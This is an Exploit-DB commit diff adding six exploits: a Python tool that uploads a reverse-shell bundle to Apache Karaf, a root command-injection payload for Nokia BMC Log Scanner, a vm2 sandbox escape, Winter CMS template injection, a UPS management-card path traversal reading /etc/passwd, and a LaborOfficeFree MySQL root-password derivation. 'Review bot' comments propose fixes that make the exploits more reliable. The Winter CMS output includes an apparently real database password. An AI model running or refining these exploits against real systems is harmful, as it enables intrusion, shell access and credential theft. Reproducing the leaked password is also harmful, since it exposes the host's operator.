DB: 2024-03-17

7 changes to exploits/shellcodes/ghdb

Karaf v4.4.3 Console - RCE

Nokia BMC Log Scanner - Remote Code Execution

vm2 - sandbox escape

UPS Network Management Card 4 - Path Traversal

Winter CMS 1.2.3 - Server-Side Template Injection (SSTI) (Authenticated)

LaborOfficeFree 19.10 - MySQL Root Password Calculator
This commit is contained in:
Exploit-DB 2024-03-17 00:16:40 +00:00
parent 2af1700331
commit 8c78d80c78
7 changed files with 688 additions and 0 deletions

427
exploits/java/webapps/51895.py Executable file

@ -0,0 +1,427 @@
#!/usr/bin/python
# Exploit Title: [Karaf v4.4.3 Console RCE]
# Date: [2023-08-07]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
# VisionSpace Technologies GmbH]
# Exploit Repository:
# [https://github.com/visionspacetec/offsec-karaf-exploits.git]
# Vendor Homepage: [https://karaf.apache.org]
# Software Link: [https://karaf.apache.org/download.html]
# Version: [4.4.3]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
# python exploit.py --help
#
# Example:
# python exploit.py --rhost=192.168.0.133 --rport=1337 \
# --lhost=192.168.0.100 --lport=4444 \
# --creds=karaf:karaf
"""
This tool will let you open a reverse shell from the system
that is running Karaf Console",
"""
import argparse
import base64
import io
import re
import zipfile
import requests
# Content of the MANIFEST.MF file.
MANIFEST_CONTENT = \
"Bundle-Name: RevShell\n" \
"Bundle-Description: Bundle openning a reverse shell connection.\n" \
"Bundle-SymbolicName: com.visionspace.osgi.revshell.Activator\n" \
"Bundle-Vendor: VisionSpace\n" \
"Bundle-Version: 1.0.0\n" \
"Import-Package: org.osgi.framework\n" \
"Bundle-Activator: com.visionspace.osgi.revshell.Activator"
# Activator.class bytecode template.
ACTIVATOR_CLASS_BYTECODE_TEMPLATE = \
b"\xca\xfe\xba\xbe\x00\x00\x00\x37\x00\x7b" \
b"\x0a\x00\x22\x00\x33\x08\x00\x34\x07\x00" \
b"\x35\x07\x00\x36\x0a\x00\x03\x00\x37\x0a" \
b"\x00\x03\x00\x38\x0a\x00\x03\x00\x39\x07" \
b"\x00\x3a\x08\x00\x3b\x08\x00\x3c\x0a\x00" \
b"\x3d\x00\x3e\x0a\x00\x08\x00\x3f\x0a\x00" \
b"\x2c\x00\x40\x0a\x00\x2c\x00\x41\x0a\x00" \
b"\x08\x00\x40\x0a\x00\x2c\x00\x42\x0a\x00" \
b"\x08\x00\x42\x0a\x00\x08\x00\x43\x0a\x00" \
b"\x2d\x00\x44\x0a\x00\x2d\x00\x45\x0a\x00" \
b"\x2e\x00\x46\x0a\x00\x2e\x00\x47\x05\x00" \
b"\x00\x00\x00\x00\x00\x00\x32\x0a\x00\x48" \
b"\x00\x49\x0a\x00\x2c\x00\x4a\x07\x00\x4b" \
b"\x0a\x00\x2c\x00\x4c\x0a\x00\x08\x00\x4d" \
b"\x09\x00\x4e\x00\x4f\x08\x00\x50\x0a\x00" \
b"\x51\x00\x52\x07\x00\x53\x07\x00\x54\x07" \
b"\x00\x55\x01\x00\x06\x3c\x69\x6e\x69\x74" \
b"\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04" \
b"\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e" \
b"\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62" \
b"\x6c\x65\x01\x00\x05\x73\x74\x61\x72\x74" \
b"\x01\x00\x25\x28\x4c\x6f\x72\x67\x2f\x6f" \
b"\x73\x67\x69\x2f\x66\x72\x61\x6d\x65\x77" \
b"\x6f\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65" \
b"\x43\x6f\x6e\x74\x65\x78\x74\x3b\x29\x56" \
b"\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61" \
b"\x70\x54\x61\x62\x6c\x65\x07\x00\x56\x07" \
b"\x00\x57\x07\x00\x58\x07\x00\x59\x01\x00" \
b"\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e" \
b"\x73\x01\x00\x04\x73\x74\x6f\x70\x01\x00" \
b"\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c" \
b"\x65\x01\x00\x0e\x41\x63\x74\x69\x76\x61" \
b"\x74\x6f\x72\x2e\x6a\x61\x76\x61\x0c\x00" \
b"\x24\x00\x25\x01\x00\x02\x73\x68\x01\x00" \
b"\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
b"\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75" \
b"\x69\x6c\x64\x65\x72\x01\x00\x10\x6a\x61" \
b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" \
b"\x72\x69\x6e\x67\x0c\x00\x24\x00\x5a\x0c" \
b"\x00\x5b\x00\x5c\x0c\x00\x28\x00\x5d\x01" \
b"\x00\x0f\x6a\x61\x76\x61\x2f\x6e\x65\x74" \
b"\x2f\x53\x6f\x63\x6b\x65\x74\x01\x00\x07" \
b"\x3c\x4c\x48\x4f\x53\x54\x3e\x01\x00\x07" \
b"\x3c\x4c\x50\x4f\x52\x54\x3e\x07\x00\x5e" \
b"\x0c\x00\x5f\x00\x60\x0c\x00\x24\x00\x61" \
b"\x0c\x00\x62\x00\x63\x0c\x00\x64\x00\x63" \
b"\x0c\x00\x65\x00\x66\x0c\x00\x67\x00\x68" \
b"\x0c\x00\x69\x00\x6a\x0c\x00\x6b\x00\x6a" \
b"\x0c\x00\x6c\x00\x6d\x0c\x00\x6e\x00\x25" \
b"\x07\x00\x6f\x0c\x00\x70\x00\x71\x0c\x00" \
b"\x72\x00\x6a\x01\x00\x13\x6a\x61\x76\x61" \
b"\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65" \
b"\x70\x74\x69\x6f\x6e\x0c\x00\x73\x00\x25" \
b"\x0c\x00\x74\x00\x25\x07\x00\x75\x0c\x00" \
b"\x76\x00\x77\x01\x00\x1d\x54\x68\x61\x6e" \
b"\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20" \
b"\x70\x77\x6e\x69\x6e\x67\x20\x77\x69\x74" \
b"\x68\x20\x75\x73\x21\x07\x00\x78\x0c\x00" \
b"\x79\x00\x7a\x01\x00\x27\x63\x6f\x6d\x2f" \
b"\x76\x69\x73\x69\x6f\x6e\x73\x70\x61\x63" \
b"\x65\x2f\x6f\x73\x67\x69\x2f\x72\x65\x76" \
b"\x73\x68\x65\x6c\x6c\x2f\x41\x63\x74\x69" \
b"\x76\x61\x74\x6f\x72\x01\x00\x10\x6a\x61" \
b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" \
b"\x6a\x65\x63\x74\x01\x00\x22\x6f\x72\x67" \
b"\x2f\x6f\x73\x67\x69\x2f\x66\x72\x61\x6d" \
b"\x65\x77\x6f\x72\x6b\x2f\x42\x75\x6e\x64" \
b"\x6c\x65\x41\x63\x74\x69\x76\x61\x74\x6f" \
b"\x72\x01\x00\x20\x6f\x72\x67\x2f\x6f\x73" \
b"\x67\x69\x2f\x66\x72\x61\x6d\x65\x77\x6f" \
b"\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65\x43" \
b"\x6f\x6e\x74\x65\x78\x74\x01\x00\x11\x6a" \
b"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50" \
b"\x72\x6f\x63\x65\x73\x73\x01\x00\x13\x6a" \
b"\x61\x76\x61\x2f\x69\x6f\x2f\x49\x6e\x70" \
b"\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00" \
b"\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f" \
b"\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61" \
b"\x6d\x01\x00\x16\x28\x5b\x4c\x6a\x61\x76" \
b"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" \
b"\x69\x6e\x67\x3b\x29\x56\x01\x00\x13\x72" \
b"\x65\x64\x69\x72\x65\x63\x74\x45\x72\x72" \
b"\x6f\x72\x53\x74\x72\x65\x61\x6d\x01\x00" \
b"\x1d\x28\x5a\x29\x4c\x6a\x61\x76\x61\x2f" \
b"\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65" \
b"\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3b" \
b"\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" \
b"\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63" \
b"\x65\x73\x73\x3b\x01\x00\x11\x6a\x61\x76" \
b"\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74" \
b"\x65\x67\x65\x72\x01\x00\x08\x70\x61\x72" \
b"\x73\x65\x49\x6e\x74\x01\x00\x15\x28\x4c" \
b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" \
b"\x53\x74\x72\x69\x6e\x67\x3b\x29\x49\x01" \
b"\x00\x16\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
b"\x3b\x49\x29\x56\x01\x00\x0e\x67\x65\x74" \
b"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" \
b"\x6d\x01\x00\x17\x28\x29\x4c\x6a\x61\x76" \
b"\x61\x2f\x69\x6f\x2f\x49\x6e\x70\x75\x74" \
b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x0e" \
b"\x67\x65\x74\x45\x72\x72\x6f\x72\x53\x74" \
b"\x72\x65\x61\x6d\x01\x00\x0f\x67\x65\x74" \
b"\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65" \
b"\x61\x6d\x01\x00\x18\x28\x29\x4c\x6a\x61" \
b"\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70" \
b"\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01" \
b"\x00\x08\x69\x73\x43\x6c\x6f\x73\x65\x64" \
b"\x01\x00\x03\x28\x29\x5a\x01\x00\x09\x61" \
b"\x76\x61\x69\x6c\x61\x62\x6c\x65\x01\x00" \
b"\x03\x28\x29\x49\x01\x00\x04\x72\x65\x61" \
b"\x64\x01\x00\x05\x77\x72\x69\x74\x65\x01" \
b"\x00\x04\x28\x49\x29\x56\x01\x00\x05\x66" \
b"\x6c\x75\x73\x68\x01\x00\x10\x6a\x61\x76" \
b"\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72" \
b"\x65\x61\x64\x01\x00\x05\x73\x6c\x65\x65" \
b"\x70\x01\x00\x04\x28\x4a\x29\x56\x01\x00" \
b"\x09\x65\x78\x69\x74\x56\x61\x6c\x75\x65" \
b"\x01\x00\x07\x64\x65\x73\x74\x72\x6f\x79" \
b"\x01\x00\x05\x63\x6c\x6f\x73\x65\x01\x00" \
b"\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
b"\x2f\x53\x79\x73\x74\x65\x6d\x01\x00\x03" \
b"\x6f\x75\x74\x01\x00\x15\x4c\x6a\x61\x76" \
b"\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74" \
b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x13" \
b"\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72" \
b"\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x01" \
b"\x00\x07\x70\x72\x69\x6e\x74\x6c\x6e\x01" \
b"\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
b"\x3b\x29\x56\x00\x21\x00\x21\x00\x22\x00" \
b"\x01\x00\x23\x00\x00\x00\x03\x00\x01\x00" \
b"\x24\x00\x25\x00\x01\x00\x26\x00\x00\x00" \
b"\x1d\x00\x01\x00\x01\x00\x00\x00\x05\x2a" \
b"\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x27" \
b"\x00\x00\x00\x06\x00\x01\x00\x00\x00\x0a" \
b"\x00\x01\x00\x28\x00\x29\x00\x02\x00\x26" \
b"\x00\x00\x01\x6e\x00\x06\x00\x0b\x00\x00" \
b"\x00\xb8\x12\x02\x4d\xbb\x00\x03\x59\x04" \
b"\xbd\x00\x04\x59\x03\x2c\x53\xb7\x00\x05" \
b"\x04\xb6\x00\x06\xb6\x00\x07\x4e\xbb\x00" \
b"\x08\x59\x12\x09\x12\x0a\xb8\x00\x0b\xb7" \
b"\x00\x0c\x3a\x04\x2d\xb6\x00\x0d\x3a\x05" \
b"\x2d\xb6\x00\x0e\x3a\x06\x19\x04\xb6\x00" \
b"\x0f\x3a\x07\x2d\xb6\x00\x10\x3a\x08\x19" \
b"\x04\xb6\x00\x11\x3a\x09\x19\x04\xb6\x00" \
b"\x12\x9a\x00\x5f\x19\x05\xb6\x00\x13\x9e" \
b"\x00\x10\x19\x09\x19\x05\xb6\x00\x14\xb6" \
b"\x00\x15\xa7\xff\xee\x19\x06\xb6\x00\x13" \
b"\x9e\x00\x10\x19\x09\x19\x06\xb6\x00\x14" \
b"\xb6\x00\x15\xa7\xff\xee\x19\x07\xb6\x00" \
b"\x13\x9e\x00\x10\x19\x08\x19\x07\xb6\x00" \
b"\x14\xb6\x00\x15\xa7\xff\xee\x19\x09\xb6" \
b"\x00\x16\x19\x08\xb6\x00\x16\x14\x00\x17" \
b"\xb8\x00\x19\x2d\xb6\x00\x1a\x57\xa7\x00" \
b"\x08\x3a\x0a\xa7\xff\x9f\x2d\xb6\x00\x1c" \
b"\x19\x04\xb6\x00\x1d\xb1\x00\x01\x00\xa1" \
b"\x00\xa6\x00\xa9\x00\x1b\x00\x02\x00\x27" \
b"\x00\x00\x00\x66\x00\x19\x00\x00\x00\x0c" \
b"\x00\x03\x00\x0e\x00\x1a\x00\x0f\x00\x2a" \
b"\x00\x10\x00\x30\x00\x11\x00\x36\x00\x12" \
b"\x00\x3d\x00\x13\x00\x43\x00\x14\x00\x4a" \
b"\x00\x15\x00\x52\x00\x16\x00\x5a\x00\x17" \
b"\x00\x67\x00\x18\x00\x6f\x00\x19\x00\x7c" \
b"\x00\x1a\x00\x84\x00\x1b\x00\x91\x00\x1c" \
b"\x00\x96\x00\x1d\x00\x9b\x00\x1e\x00\xa1" \
b"\x00\x20\x00\xa6\x00\x21\x00\xa9\x00\x22" \
b"\x00\xab\x00\x23\x00\xae\x00\x25\x00\xb2" \
b"\x00\x26\x00\xb7\x00\x27\x00\x2a\x00\x00" \
b"\x00\x30\x00\x07\xff\x00\x4a\x00\x0a\x07" \
b"\x00\x21\x07\x00\x2b\x07\x00\x04\x07\x00" \
b"\x2c\x07\x00\x08\x07\x00\x2d\x07\x00\x2d" \
b"\x07\x00\x2d\x07\x00\x2e\x07\x00\x2e\x00" \
b"\x00\x07\x14\x14\x14\x57\x07\x00\x1b\x04" \
b"\x00\x2f\x00\x00\x00\x04\x00\x01\x00\x1b" \
b"\x00\x01\x00\x30\x00\x29\x00\x02\x00\x26" \
b"\x00\x00\x00\x25\x00\x02\x00\x02\x00\x00" \
b"\x00\x09\xb2\x00\x1e\x12\x1f\xb6\x00\x20" \
b"\xb1\x00\x00\x00\x01\x00\x27\x00\x00\x00" \
b"\x0a\x00\x02\x00\x00\x00\x2a\x00\x08\x00" \
b"\x2b\x00\x2f\x00\x00\x00\x04\x00\x01\x00" \
b"\x1b\x00\x01\x00\x31\x00\x00\x00\x02\x00" \
b"\x32"
# Items to be replaces within the bytecode of Activator.class
# <LEN><LHOST> = <\x07><\x3c\x4c\x48\x4f\x53\x54\x3e>
ACTIVATOR_CLASS_LHOST_TAG = b"\x07\x3c\x4c\x48\x4f\x53\x54\x3e"
# <LEN><LPORT> = <\x07><\x3c\x4c\x50\x4f\x52\x54\x3e>
ACTIVATOR_CLASS_LPORT_TAG = b"\x07\x3c\x4c\x50\x4f\x52\x54\x3e"
def parse():
"""
This function parses the command-line arguments.
"""
parser = argparse.ArgumentParser(
prog="Karaf-Console-RCE",
description="This tool will let you open a reverse shell from the "
"system that is running Karaf Console",
epilog="Happy Hacking! :)",
)
parser.add_argument("--rhost", dest="rhost",
help="remote host", type=str, required=True)
parser.add_argument("--rport", dest="rport",
help="remote port", type=int, required=True)
parser.add_argument("--lhost", dest="lhost",
help="local host", type=str, required=True)
parser.add_argument("--lport", dest="lport",
help="local port", type=int, required=True)
parser.add_argument("--creds", dest="creds",
help="credentials in format <username:password>",
type=str, required=True)
parser.add_argument("--version", action="version",
version="%(prog)s 0.1.0")
return parser.parse_args()
def extract_jsessionid(cookie):
"""
This function extracts the JSESSIONID from the cookie string.
"""
jsessionid = None
regex = re.findall("JSESSIONID=([^;]+)", cookie)
if len(regex) > 0:
jsessionid = regex[0]
return jsessionid
def authenticate(target, basic_auth):
"""
This function connects to the URL and retrieves the JSESSIONID
based on the Basic Authorization.
"""
jsessionid = None
headers = {
"Authorization": basic_auth
}
response = requests.get(target, headers=headers,
allow_redirects=False, timeout=10)
if (response.status_code == 302 and response.headers["Set-Cookie"]):
jsessionid = extract_jsessionid(response.headers["Set-Cookie"])
return jsessionid
def generate_payload(lhost, lport):
"""
This function generates the payload.
It replaces the template payload with the `lhost` and `lport` arguments.
"""
payload = None
lhost_byte_array = bytearray()
lhost_byte_array.append(len(lhost))
lhost_byte_array.extend(map(ord, lhost))
activator_class_bytecodes = ACTIVATOR_CLASS_BYTECODE_TEMPLATE.replace(
ACTIVATOR_CLASS_LHOST_TAG, lhost_byte_array)
lport_str = str(lport)
lport_byte_array = bytearray()
lport_byte_array.append(len(lport_str))
lport_byte_array.extend(map(ord, lport_str))
activator_class_bytecodes = activator_class_bytecodes.replace(
ACTIVATOR_CLASS_LPORT_TAG, lport_byte_array)
jar_bytes = io.BytesIO()
with zipfile.ZipFile(jar_bytes, "w", zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr("com/visionspace/osgi/revshell/Activator.class",
activator_class_bytecodes)
zip_file.writestr("META-INF/MANIFEST.MF", MANIFEST_CONTENT)
payload = jar_bytes.getvalue()
return payload
def deploy_payload(target, basic_auth, jsessionid, payload):
"""
This function connects to the Karaf Console and deployes the payload.
"""
success = False
url = f"{target}/bundles"
cookies = {
"JSESSIONID": jsessionid
}
headers = {
"Authorization": basic_auth
}
files = {
"bundlefile": (
"revshell.jar", payload, "application/x-java-archive")
}
data = {
"action": "install",
"bundlestart": "start",
"bundlestartlevel": 80
}
response = requests.post(url, headers=headers, cookies=cookies,
files=files, data=data, timeout=10,
allow_redirects=False)
if response.status_code == 302:
success = True
return success
def generate_basic_auth(creds):
"""
This function generates the Basic Authorization string based
on the credentials.
"""
creds_base64 = base64.b64encode(creds.encode()).decode()
basic_auth = f"Basic {creds_base64}"
return basic_auth
def create_target_url(rhost, rport):
"""
This function creates a target URL.
"""
target_url = f"http://{rhost}:{rport}/system/console"
return target_url
def main(args):
"""
Main function.
"""
target = create_target_url(args.rhost, args.rport)
print("[*] Login...")
basic_auth = generate_basic_auth(args.creds)
jsessionid = authenticate(target, basic_auth)
if jsessionid:
print("[+] Session established.")
print("[*] Generating payload...")
payload = generate_payload(args.lhost, args.lport)
if payload:
print("[*] Deploying payload...")
if deploy_payload(target, basic_auth, jsessionid, payload):
print("[+] Done.")
else:
print("[-] Failed to deploy the payload!")
else:
print("[-] Failed to generate the payload!")
else:
print("[-] Login failed!")
if __name__ == "__main__":
main(parse())
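Review bot: `authenticate` indexes `response.headers["Set-Cookie"]` on the right-hand side of the `and`, so a 302 that carries no cookie — for example a redirect to the login page when the credentials are rejected — raises `KeyError` instead of returning `None` and reaching the "Login failed!" branch in `main`; since `requests` already parses cookies, the branch can be `if response.status_code == 302: jsessionid = response.cookies.get("JSESSIONID")`, which also makes `extract_jsessionid` and its regex unnecessary. `deploy_payload` has the same weakness in reverse: any 302 is reported as "Done.", including a redirect back to login on an expired session, so checking the `Location` header (or listing `/bundles` afterwards for the `Bundle-SymbolicName` from `MANIFEST_CONTENT`) would give a real success signal. `generate_payload` overwrites the low byte of a CONSTANT_Utf8 length with `len(lhost)` and the bytes with `map(ord, lhost)`, so a host string longer than 255 characters or containing non-ASCII fails with a bare `ValueError` from `bytearray`; a guard such as `if len(lhost) > 255 or not lhost.isascii(): raise ValueError("lhost must be ASCII and at most 255 bytes")` would explain the failure. `create_target_url` hard-codes `http://`, so a console served over TLS cannot be targeted without editing the script; a `--scheme` option defaulting to `http` would keep the interface backward-compatible.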


@ -0,0 +1,25 @@
# Exploit Title: Nokia BMC Log Scanner Remote Code Execution
# Google Dork: N/A
# Date: November 29, 2023
# Exploit Author: Carlos Andres Gonzalez, Matthew Gregory
# Vendor Homepage: https://www.nokia.com/
# Software Link: N/A
# Version: 13
# Tested on: Linux
# CVE : CVE-2022-45899
Description
The BMC Log Scanner web application, available on several hosts, is vulnerable to command injection
attacks, allowing for unauthenticated remote code execution. This vulnerability is especially significant
because this service runs as root.
Steps to Reproduce:
In the Search Pattern field, type:
;";command
Replacing the word "command" above with any Linux command.
Root access can be confirmed with the id command or any other command that would require
root access, such as displaying the contents of the /etc/shadow file."
This issue was fixed in version 13.1.
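Review bot: The reproduction names only a form field ("Search Pattern") and the payload `;";command`, with no request path, HTTP method or parameter name, so a reader cannot reproduce the issue or write a detection rule from this advisory alone; one line of the form `Request: <METHOD> /<path> with <parameter>=;";id`, filled in from the original finding, would make it usable. The stray closing quote after "/etc/shadow file" at the end of the reproduction text looks like a paste artifact and should be dropped. The advisory cites CVE-2022-45899, but the index row added for `exploits/linux/webapps/51896.txt` in this commit leaves the CVE column empty, so the identifier is not searchable.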


@ -0,0 +1,44 @@
/*
# Exploit Title: vm2 Sandbox Escape vulnerability
# Date: 23/12/2023
# Exploit Author: Calil Khalil & Adriel Mc Roberts
# Vendor Homepage: https://github.com/patriksimek/vm2
# Software Link: https://github.com/patriksimek/vm2
# Version: vm2 <= 3.9.19
# Tested on: Ubuntu 22.04
# CVE : CVE-2023-37466
*/
const { VM } = require("vm2");
const vm = new VM();
const command = 'pwd'; // Change to the desired command
const code = `
async function fn() {
(function stack() {
new Error().stack;
stack();
})();
}
try {
const handler = {
getPrototypeOf(target) {
(function stack() {
new Error().stack;
stack();
})();
}
};
const proxiedErr = new Proxy({}, handler);
throw proxiedErr;
} catch ({ constructor: c }) {
const childProcess = c.constructor('return process')().mainModule.require('child_process');
childProcess.execSync('${command}');
}
`;
console.log(vm.run(code));
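Review bot: `command` is spliced into the sandboxed source through a template literal (`childProcess.execSync('${command}')`), so any command containing a single quote or backslash breaks the generated script instead of running; writing `childProcess.execSync(${JSON.stringify(command)})` inside the outer template (no surrounding quotes) keeps the substitution and is safe for every command string. `execSync` returns a `Buffer`, so if the script's completion value is what `vm.run` hands back, `console.log(vm.run(code))` prints `<Buffer ...>` rather than the command output — appending `.toString()` to the `execSync` call inside the sandbox code makes the PoC readable. The file is plainly Node.js, yet the index row this commit adds for it (`exploits/multiple/local/51898.c`) files it with a `.c` extension, credits only one of the two authors named in the header, drops the `<= 3.9.19` version and leaves the CVE column empty although the header cites CVE-2023-37466.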


@ -0,0 +1,74 @@
# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)
# Exploit Author: tmrswrr
# Date: 12/05/2023
# Vendor: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter/releases/v1.2.2
# Vulnerable Version(s): 1.2.2
#Tested : https://www.softaculous.com/demos/WinterCMS
1 ) Login with admin cred and click CMS > Pages field > Plugin components >
https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup
2 ) Write SSTI payload : {{7*7}}
3 ) Save it , Click Priview :
https://demos6.demo.com/WinterCMS/demo/plugins
4 ) You will be see result :
49
Payload :
{{ dump() }}
Result :
"*::database" => array:4 [▼
"default" => "mysql"
"connections" => array:4 [▼
"sqlite" => array:5 [▼
"database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"
"driver" => "sqlite"
"foreign_key_constraints" => true
"prefix" => ""
"url" => null
]
"mysql" => array:15 [▼
"charset" => "utf8mb4"
"collation" => "utf8mb4_unicode_ci"
"database" => "soft_pw3qsny"
"driver" => "mysql"
"engine" => "InnoDB"
"host" => "localhost"
"options" => []
"password" => "8QSz9(pT)3"
"port" => 3306
"prefix" => ""
"prefix_indexes" => true
"strict" => true
"unix_socket" => ""
"url" => null
"username" => "soft_pw3qsny"
]
"pgsql" => array:12 [▶]
"sqlsrv" => array:10 [▶]
]
"migrations" => "migrations"
"redis" => array:4 [▼
"client" => "phpredis"
"options" => array:2 [▼
"cluster" => "redis"
"prefix" => "winter_database_"
]
"default" => array:5 [▼
"database" => "0"
"host" => "127.0.0.1"
"password" => null
"port" => "6379"
"url" => null
]
"cache" => array:5 [▼
"database" => "1"
"host" => "127.0.0.1"
"password" => null
"port" => "6379"
"url" => null
]
]
]
]
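Review bot: The header (`Exploit Title: Winter CMS 1.2.2`, `Vulnerable Version(s): 1.2.2`, software link for `v1.2.2`) disagrees with the commit message, which lists this entry as "Winter CMS 1.2.3"; one of the two is wrong and the affected version should be reconciled before publication. The `{{ dump() }}` output reproduced at the end contains what looks like a live MySQL credential pair (`"username" => "soft_pw3qsny"`, `"password" => "8QSz9(pT)3"`) plus internal paths from the third-party demo host used for testing; the `{{7*7}}` → `49` step already demonstrates evaluation, so the value should be replaced with `"password" => "<redacted>"` and the demo operator notified. The write-up also does not say whether editing CMS page markup is meant to be denied to the backend role used, so it is unclear whether the vendor treats Twig evaluation by an authenticated administrator as a vulnerability or as intended functionality; a sentence on that, and on vendor contact, would help readers triage it.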


@ -0,0 +1,34 @@
# Exploit Title: UPS Network Management Card 4 - Path Traversal
# Google Dork: inurl:nmc inurl:logon.htm
# Date: 2023-12-19
# Exploit Author: Víctor García
# Vendor Homepage: https://www.apc.com/
# Version: 4
# Tested on: Kali Linux
# CVE: N/A
# PoC:
curl -k
https://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
dhcp:x:997:997::/var/run/dhcp:/bin/false
messagebus:x:998:998::/var/lib/dbus:/bin/false
mosquitto:x:999:999::/home/mosquitto:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
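Review bot: The PoC is not reproducible as written: `curl -k` and the URL sit on separate lines, and the header gives neither the affected firmware version nor the web path the traversal is relative to, so `# Version: 4` (the NMC 4 product line) cannot be matched against a deployed unit; `curl -k 'https://<host>/%2e%2e%2f…%2fetc%2fpasswd'` on one line plus a `# Tested firmware: <version>` line would fix both. A `# Vendor fix: <advisory or fixed version, or "none at time of writing">` line is missing, which matters for an internet-facing device discoverable with the given dork. The output shown is `/etc/passwd`, which proves an unauthenticated file read but says nothing about which account the web server reads as; stating that (or that it was not determined) would make the impact claim precise.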

78
exploits/windows/local/51894.py Executable file

@ -0,0 +1,78 @@
# Exploit Title: LaborOfficeFree 19.10 MySQL Root Password Calculator - CVE-2024-1346
# Google Dork: N/A
# Date: 09/02/2023
# Exploit Author: Peter Gabaldon - https://pgj11.com/
# Vendor Homepage: https://www.laborofficefree.com/
# Software Link: https://www.laborofficefree.com/#plans
# Version: 19.10
# Tested on: Windows 10
# CVE : CVE-2024-1346
# Description: LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedly, versions prior to 19.10 are also vulnerable.
"""
After installing LaborOfficeFree in testing lab and revesing the backup process, it is possible to determine that it creates a "mysqldump.exe" process with the root user and the password being derived from the string "hola" concated with "00331-20471-98465-AA370" (in this case). This appears to be the license, but it is different from the license shown in the GUI dashboard. This license has to be extracted from memory. From example, attaching a debugger and breaking in the mysqldump process (for that, admin rights are NOT needed).
Also, the app checks if you are an admin to perform the backup and fails if the program is not running as adminsitrator. But, this check is not effective, as it is actually calling mysqldump with a derived password. Thus, administrator right are not needed.
Here is the disassembly piece of the procedure in LaborOfficeFree.exe responsible of calculating the root password.
00506548 | 53 | push ebx | Aqui se hacen el XOR y demas que calcula la pwd :)
00506549 | 56 | push esi |
0050654A | A3 7CFD8800 | mov dword ptr ds:[88FD7C],eax | eax:"hola00331-20471-98465-AA370"
0050654F | 0FB7C2 | movzx eax,dx | eax:"hola00331-20471-98465-AA370"
00506552 | 85C0 | test eax,eax | eax:"hola00331-20471-98465-AA370"
00506554 | 7E 2E | jle laborofficefree.506584 |
00506556 | BA 01000000 | mov edx,1 |
0050655B | 8B1D 7CFD8800 | mov ebx,dword ptr ds:[88FD7C] |
00506561 | 0FB65C13 FF | movzx ebx,byte ptr ds:[ebx+edx-1] |
00506566 | 8B31 | mov esi,dword ptr ds:[ecx] |
00506568 | 81E6 FF000000 | and esi,FF |
0050656E | 33DE | xor ebx,esi |
